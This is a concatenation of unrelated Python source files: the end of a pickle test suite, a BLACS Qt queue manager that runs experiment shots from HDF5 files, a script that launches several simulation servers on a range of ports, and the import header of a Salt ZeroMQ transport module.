self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
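# A hedged, illustrative sketch (not part of the test suite above): the
# instance-wide dispatch_table mechanism tested in _test_dispatch_table(),
# shown with the concrete stdlib Pickler and a custom reducer for complex.
def _sketch_instance_dispatch_table():
    import copyreg
    import io
    import pickle
    buf = io.BytesIO()
    pickler = pickle.Pickler(buf)
    pickler.dispatch_table = copyreg.dispatch_table.copy()
    # Reduce complex numbers via an explicit (callable, args) pair.
    pickler.dispatch_table[complex] = lambda z: (complex, (z.real, z.imag))
    pickler.dump(1 + 2j)
    return pickle.loads(buf.getvalue())  # -> (1+2j)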
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
queue.py
|
#####################################################################
# #
# /queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import logging
import os
import platform
import Queue
import threading
import time
import sys
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
import zprocess.locking, labscript_utils.h5_lock, h5py
zprocess.locking.set_client_process_name('BLACS.queuemanager')
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
# Connection Table Code
from connections import ConnectionTable
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
                        self._logger.info('Dropped file not added to queue because there is no access to the necessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
self._callbacks = None
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
@inmain_decorator(True)
def get_callbacks(self, name, update_cache=False):
if update_cache or self._callbacks is None:
self._callbacks = {}
try:
for plugin in self.BLACS.plugins.values():
callbacks = plugin.get_callbacks()
if isinstance(callbacks, dict):
for callback_name, callback in callbacks.items():
if callback_name not in self._callbacks:
self._callbacks[callback_name] = []
self._callbacks[callback_name].append(callback)
except Exception as e:
                self._logger.exception('An error occurred during get_callbacks.')
if name in self._callbacks:
return self._callbacks[name]
else:
return []
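    # A hedged sketch of the plugin side of this contract (the callback name
    # is taken from how get_callbacks() is consumed below, e.g.
    # 'analysis_cancel_send'; the plugin class itself is hypothetical):
    #
    #     class ExamplePlugin(object):
    #         def get_callbacks(self):
    #             return {'analysis_cancel_send': self.skip_shot}
    #
    #         def skip_shot(self, h5_filepath):
    #             # Returning True stops this shot being sent to analysis.
    #             return 'calibration' in os.path.basename(h5_filepath)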
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
            # only move the row if it is not the last element, and the row below it is not selected
            # (note that while a row below may have been initially selected, it should by now be one row lower
            # since we start moving elements of the list downwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
                # Add the selected row into a position one below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
            # only move the row while it is not the last element, and the row below it is not selected
            # (note that while a row below may have been initially selected, it should by now be one row lower
            # since we start moving elements of the list downwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
                # Add the selected row into a position one below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath)
except:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath) as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
                    return 'Cannot create a re-run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename = os.path.basename(h5_filepath).split('.h5')[0]
if '_rep' in basename:
reps = int(basename.split('_rep')[1])
return h5_filepath.split('_rep')[-2] + '_rep%05d.h5' % (reps + 1), reps + 1
return h5_filepath.split('.h5')[0] + '_rep%05d.h5' % 1, 1
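    # Illustrative examples of the naming scheme above (not executed):
    #   new_rep_name('/data/shot.h5')           -> ('/data/shot_rep00001.h5', 1)
    #   new_rep_name('/data/shot_rep00001.h5')  -> ('/data/shot_rep00002.h5', 2)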
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file,'r') as old_file:
with h5py.File(new_h5_file,'w') as new_file:
groups_to_copy = ['devices', 'calibrations', 'script', 'globals', 'connection table',
'labscriptlib', 'waits']
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception as e:
#raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = Queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
start_time = time.time()
self.current_queue = Queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
with h5py.File(path,'r') as hdf5_file:
h5_file_devices = hdf5_file['devices/'].keys()
for name in h5_file_devices:
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception as e:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
devices_in_use = transition_list.copy()
while transition_list and not error_condition:
try:
                        # Wait for a device to finish transition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except Queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
                    # Pause the queue, re-add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = Queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = Queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = time.localtime()
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except Queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except Queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
                    repeat_number = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
os.remove(path)
os.rename('temp.h5', path)
except WindowsError if platform.system() == 'Windows' else None:
logger.warning('Couldn\'t delete failed run file %s, another process may be using it. Using alternate filename for second attempt.'%path)
os.rename('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = Queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table = False)
with h5py.File(path,'r+') as hdf5_file:
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S',run_time)
# A Queue for event-based notification of when the devices have transitioned to static mode:
# Shouldn't need to recreate the queue: self.current_queue = Queue.Queue()
# TODO: unserialise this if everything is using zprocess.locking
# only transition one device to static at a time,
# since writing data to the h5 file can potentially
# happen at this stage:
error_condition = False
# This is far more complicated than it needs to be once transition_to_manual is unserialised!
response_list = {}
for device_name, tab in devices_in_use.items():
if device_name not in response_list:
tab.transition_to_manual(self.current_queue)
while True:
# TODO: make the call to current_queue.get() timeout
# and periodically check for error condition on the tab
got_device_name, result = self.current_queue.get()
# if the response is not for this device, then save it for later!
if device_name != got_device_name:
response_list[got_device_name] = result
else:
break
else:
result = response_list[device_name]
# Check for abort signal from device restart
if result == 'fail':
error_condition = True
if result == 'restart':
error_condition = True
if self.get_device_error_state(device_name,devices_in_use):
error_condition = True
# Once device has transitioned_to_manual, disconnect restart signal
inmain(tab.disconnect_restart_receiver,restart_function)
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception as e:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_number = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
os.remove(path)
os.rename('temp.h5', path)
except WindowsError if platform.system() == 'Windows' else None:
logger.warning('Couldn\'t delete failed run file %s, another process may be using it. Using alternate filename for second attempt.'%path)
os.rename('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode. Since the experiment is over before this try/except block begins, we can
# safely call transition_to_manual() on each device tab
# TODO: Not serialised...could be bad with older BIAS versions :(
self.current_queue = Queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.transition_to_manual(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in self.get_callbacks('analysis_cancel_send'):
try:
if callback(path) is True:
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
if self.manager_repeat:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
                    self._logger.exception('Failed to copy h5_file (%s) for repeat run' % path)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
launch_servers.py
|
from multiprocessing import Process
import time
import argparse
import socket
import os
from utils import check_ports_avail
ap = argparse.ArgumentParser()
ap.add_argument("-n", "--number-servers", required=True, help="number of servers to spawn", type=int)
ap.add_argument("-p", "--ports-start", required=True, help="the start of the range of ports to use", type=int)
ap.add_argument("-t", "--host", default="None", help="the host; default is local host; string either internet domain or IPv4", type=str)
args = vars(ap.parse_args())
number_servers = args["number_servers"]
ports_start = args["ports_start"]
host = args["host"]
if host == 'None':
host = socket.gethostname()
list_ports = [ind_server + ports_start for ind_server in range(number_servers)]
print("To be used ports:{}".format(list_ports));
# check for the availability of the ports
if not check_ports_avail(host, list_ports):
quit()
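# A hedged sketch of what a port-availability check like the imported
# check_ports_avail() might do (the real helper lives in utils and may differ):
# a port counts as available if we can bind to it and release it immediately.
def _sketch_check_ports_avail(check_host, ports):
    for port in ports:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            probe.bind((check_host, port))
        except OSError:
            print("port {} on {} is not available".format(port, check_host))
            return False
        finally:
            probe.close()
    return True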
# make copies of the code to avoid collisions
for rank in range(number_servers):
print("copy files for env of rank {}".format(rank))
# the necessary files and folders
list_to_copy = ['environment.py',
'fenics_solver.py',
'generate_shape.py',
'meshes_utils.py',
'shapes_utils.py',
'parametered_env.py',
'start_one_server.py',
'RemoteEnvironmentClient.py',
'RemoteEnvironmentServer.py',
'echo_server.py',
'reset']
# make the env folder and copy all the necessary files
if not os.path.exists('env_' + str(rank)):
os.system('mkdir ' + 'env_' + str(rank) + '/')
for crrt_to_copy in list_to_copy:
os.system('cp -r ' + crrt_to_copy + ' env_' + str(rank) + '/.')
def launch_one_server(rank, host, port):
os.system('cd env_{} && python3 start_one_server.py -t {} -p {}'.format(rank, host, port))
processes = []
# launch all the servers one after the other
if __name__ == '__main__':
for rank, port in enumerate(list_ports):
print("launching process of rank {}".format(rank))
proc = Process(target=launch_one_server, args=(rank, host, port))
proc.start()
processes.append(proc)
time.sleep(2.0) # just to avoid collisions in the terminal printing
print("all processes started, ready to serve...")
for proc in processes:
proc.join()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import errno
import hashlib
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
